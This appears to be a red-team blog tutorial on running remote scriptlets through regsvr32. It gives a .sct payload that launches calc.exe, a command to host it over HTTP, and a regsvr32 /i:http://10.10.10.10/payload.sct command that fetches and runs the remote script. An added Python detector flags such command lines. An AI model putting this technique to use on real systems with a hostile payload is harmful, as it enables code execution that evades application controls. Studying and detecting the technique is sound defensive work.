Running Remote Scripts Using regsvr32

Usage example:

REM register a DLL
regsvr32 file.dll
REM unregister a DLL
regsvr32 /u file.dll

Let’s Start!

We will use calc.exe as the program to execute, and Process Hacker to view the resulting process.

Save the following scriptlet as payload.sct:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Pentest"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

Serve the file over HTTP:

python3 -m http.server 80

Then run regsvr32 on the Windows machine, pointing /i: at the hosted scriptlet:

regsvr32.exe /s /i:http://10.10.10.10/payload.sct scrobj.dll
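A defender's view of the regsvr32 command line above, as an added example that is not part of the original post: a Python check for process-creation command lines (for instance from Sysmon Event ID 1 or Security event 4688 with command-line auditing). The function names, reason strings and sample lines are constructed for illustration, and the check also covers `-` switch prefixes, mixed case and local .sct paths, which the post does not show.

```python
import re
import shlex

# regsvr32 accepts "/" or "-" as the switch prefix, in any letter case.
I_SWITCH = re.compile(r'^[/-]i:(?P<arg>.+)$', re.IGNORECASE)
REMOTE = re.compile(r'^https?://', re.IGNORECASE)


def basename(path):
    """Lower-cased final component of a Windows path."""
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def classify_regsvr32(cmdline):
    """Return the reasons a command line looks like scriptlet execution
    through regsvr32; an empty list means nothing matched."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keeps backslashes intact
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        tokens = cmdline.split()
    tokens = [t.strip('"') for t in tokens]
    if not tokens or basename(tokens[0]) not in ('regsvr32', 'regsvr32.exe'):
        return []
    reasons = []
    for tok in tokens[1:]:
        m = I_SWITCH.match(tok)
        if m:
            arg = m.group('arg').strip('"')
            if REMOTE.match(arg):
                reasons.append('remote /i: argument: ' + arg)
            elif arg.lower().endswith('.sct'):
                reasons.append('scriptlet file in /i: argument: ' + arg)
        elif basename(tok) == 'scrobj.dll':
            reasons.append('scrobj.dll as target DLL')
    return reasons


# Constructed sample command lines (not taken from real logs).
SAMPLES = [
    'regsvr32.exe /s /i:http://10.10.10.10/payload.sct scrobj.dll',
    r'"C:\Windows\SysWOW64\regsvr32.exe" -s -i:HTTPS://example.test/a.sct ScrObj.dll',
    'regsvr32 /u file.dll',
    'python3 -m http.server 80',
]

if __name__ == '__main__':
    for line in SAMPLES:
        print(classify_regsvr32(line) or 'no match', '<-', line)
```

Ordinary DLL registration and unregistration, as in the usage example at the top of the post, produces no match.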

R00T, 14 years old, from Jordan, interested in red teaming & malware development.